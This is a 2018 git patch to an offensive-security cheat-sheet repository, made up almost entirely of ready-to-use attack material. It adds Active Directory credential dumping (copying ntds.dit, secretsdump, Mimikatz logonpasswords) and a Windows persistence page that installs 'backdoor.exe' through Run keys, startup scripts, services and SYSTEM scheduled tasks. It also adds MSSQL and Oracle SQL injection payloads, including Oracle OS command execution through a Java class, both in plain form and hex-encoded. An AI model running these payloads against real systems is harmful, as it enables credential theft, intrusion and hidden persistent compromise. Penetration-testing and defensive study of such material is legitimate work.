From cb3b298451428735e47a622aff18d0e7d95d6eae Mon Sep 17 00:00:00 2001 From: Swissky Date: Fri, 27 Apr 2018 23:31:58 +0200 Subject: [PATCH] Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) --- .../Active Directory Attack.md | 29 +++++-- .../Windows - Mimikatz.md | 3 + .../Windows - Persistence.md | 58 +++++++++++++ SQL injection/MSSQL Injection.md | 16 ++++ SQL injection/OracleSQL Injection.md | 85 +++++++++++++++++++ SQL injection/README.md | 38 +++++++++ 6 files changed, 220 insertions(+), 9 deletions(-) create mode 100644 Methodology and Resources/Windows - Persistence.md create mode 100644 SQL injection/OracleSQL Injection.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b663a6e..6ee1500 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -18,7 +18,7 @@ ``` * Unconstrained Delegation (incl. pass-the-ticket) * OverPass-the-Hash (Making the most of NTLM password hashes) - * Pivoting with Local Admin & Passwords in SYSVOL + * GPO - Pivoting with Local Admin & Passwords in SYSVOL ```c findstr /S /I cpassword \\\sysvol\\policies\*.xml @@ -27,9 +27,16 @@ Metasploit: scanner/smb/smb_enumshares Metasploit: windows/gather/enumshares Metasploit: windows/gather/credentials/gpp + + + /!\ GPO Priorization : Organization Unit > Domain > Site > Local + List all GPO for a domain : + Get-GPO -domaine DOMAIN.COM -all + Get-GPOReport -all -reporttype xml --all ``` * Dangerous Built-in Groups Usage - * Dumping AD Domain Credentials + + * Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit) ```c C:\>ntdsutil ntdsutil: activate instance ntds @@ -38,11 +45,22 @@ ifm: quit ntdsutil: quit + or + + vssadmin create shadow /for=C : + Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit + + then you need to use secretsdump to extract the hashes secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL + or Metasploit : windows/gather/credentials/domain_hashdump + + or + + PowerSploit : Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit ``` * Golden Tickets Mimikatz version @@ -88,13 +106,6 @@ * RottenPotato * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) -## Mimikatz -``` -load mimikatz -mimikatz_command -f sekurlsa::logonPasswords full -mimikatz_command -f sekurlsa::wdigest -``` - ## PowerSploit ``` https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 4aa836d..53036d2 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -14,6 +14,9 @@ PS C:\temp\mimikatz> .\mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::wdigest + +mimikatz_command -f sekurlsa::logonPasswords full +mimikatz_command -f sekurlsa::wdigest ``` Mimikatz Golden ticket diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md new file mode 100644 index 0000000..4607457 --- /dev/null +++ b/Methodology and Resources/Windows - Persistence.md @@ -0,0 +1,58 @@ +# Windows - Persistence + +## Userland + +### Registry +Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. +``` +Value name: Backdoor +Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe +``` + +### Startup +Create a batch script in the user startup folder. +``` +PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat +start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe +``` + +### Scheduled Task +``` +PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" +PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" +PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" +PS C:\> $S = New-ScheduledTaskSettingsSet +PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S +PS C:\> Register-ScheduledTask Backdoor -InputObject $D +``` + + +## Elevated + +### HKLM +Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows. +``` +Value name: Backdoor +Value data: C:\Windows\Temp\backdoor.exe +``` + +### Services +Create a service that will start automatically or on-demand. +``` +PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." +``` + +### Scheduled Tasks +Scheduled Task to run as SYSTEM, everyday at 9am. +``` +PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe" +PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am +PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest +PS C:\> $S = New-ScheduledTaskSettingsSet +PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S +PS C:\> Register-ScheduledTask Backdoor -InputObject $D +``` + + +## Thanks to + * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md index 8cd9618..7711f11 100644 --- a/SQL injection/MSSQL Injection.md +++ b/SQL injection/MSSQL Injection.md @@ -20,6 +20,8 @@ SELECT DB_NAME(N); — for N = 0, 1, 2, … ``` SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable + +SELECT table_catalog, column_name FROM information_schema.columns ``` ## MSSQL List Tables @@ -27,6 +29,8 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’; SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable + +SELECT table_catalog, table_name FROM information_schema.columns ``` @@ -44,7 +48,19 @@ SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master. ## MSSQL Error based ``` For integer inputs : convert(int,@@version) +For integer inputs : cast((SELECT @@version) as int) + For string inputs : ' + convert(int,@@version) + ' +For string inputs : ' + cast((SELECT @@version) as int) + ' +``` + + +## MSSQL Blind based +``` +SELECT @@version WHERE @@version LIKE '%12.0.2000.8%' + +WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table) +SELECT message FROM data WHERE row = 1 and message like 't%' ``` ## MSSQL Time based diff --git a/SQL injection/OracleSQL Injection.md b/SQL injection/OracleSQL Injection.md new file mode 100644 index 0000000..0a76ee5 --- /dev/null +++ b/SQL injection/OracleSQL Injection.md @@ -0,0 +1,85 @@ +# Oracle SQL Injection + +## Oracle SQL version +``` +SELECT user FROM dual UNION SELECT * FROM v$version +``` + +## Oracle SQL database name +``` +SELECT global_name FROM global_name; +SELECT name FROM V$DATABASE; +SELECT instance_name FROM V$INSTANCE; +SELECT SYS.DATABASE_NAME FROM DUAL; +``` + +## Oracle SQL List Databases +``` +SELECT DISTINCT owner FROM all_tables; +``` + +## Oracle SQL List Column +``` +SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; +SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; +``` + +## Oracle SQL List Tables +``` +SELECT table_name FROM all_tables; +SELECT owner, table_name FROM all_tables; +SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; +``` + +## Oracle SQL Error based + +| Description | Query | +| :------------- | :------------- | +| Invalid HTTP Request | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual | +| CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual | +| Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual | +| Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual | +| Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users | + + +## Oracle SQL Blind + +| Description | Query | +| :------------- | :------------- | +| Version is 12.2 | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; | +| Subselect is enabled | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) | +| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); | +| Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; | +| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; | + + + +## Oracle SQL Command execution +``` +/* create Java class */ +BEGIN +EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; +END; +/ + +BEGIN +EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';'; +END; +/ + +/* run OS command */ +SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; +``` +or (hex encoded) + +``` +/* create Java class */ +SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d'')); +EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual + +/* run OS command */ +SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; +``` + +## Thanks to + * [Heavily taken inspired by - NetSpi SQL Wiki ](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle) diff --git a/SQL injection/README.md b/SQL injection/README.md index 709d5af..7654f2c 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -34,6 +34,14 @@ Merging characters '%2B'HERP ``` +Logic Testing +``` +page.asp?id=1 or 1=1 -- true +page.asp?id=1' or 1=1 -- true +page.asp?id=1" or 1=1 -- true +page.asp?id=1 and 1=2 -- false +``` + Weird characters ``` Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was @@ -42,6 +50,35 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') ``` +## DBMS Identification +``` +["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"], +["connection_id()=connection_id()" ,"MYSQL"], +["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"], +["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"], +["@@CONNECTIONS>0" ,"MSSQL"], +["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"], +["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"], +["USER_ID(1)=USER_ID(1)" ,"MSSQL"], +["ROWNUM=ROWNUM" ,"ORACLE"], +["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"], +["LNNVL(0=123)" ,"ORACLE"], +["5::int=5" ,"POSTGRESQL"], +["5::integer=5" ,"POSTGRESQL"], +["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"], +["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"], +["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"], +["current_database()=current_database()" ,"POSTGRESQL"], +["sqlite_version()=sqlite_version()" ,"SQLITE"], +["last_insert_rowid()>1" ,"SQLITE"], +["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"], +["val(cvar(1))=1" ,"MSACCESS"], +["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"], +["cdbl(1)=cdbl(1)" ,"MSACCESS"], +["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], +["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], +``` + ## SQL injection using SQLmap Basic arguments for SQLmap @@ -349,6 +386,7 @@ mysql> mysql> select version(); ## Thanks to - Other resources * Detect SQLi - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) + - [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/) * MySQL: - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)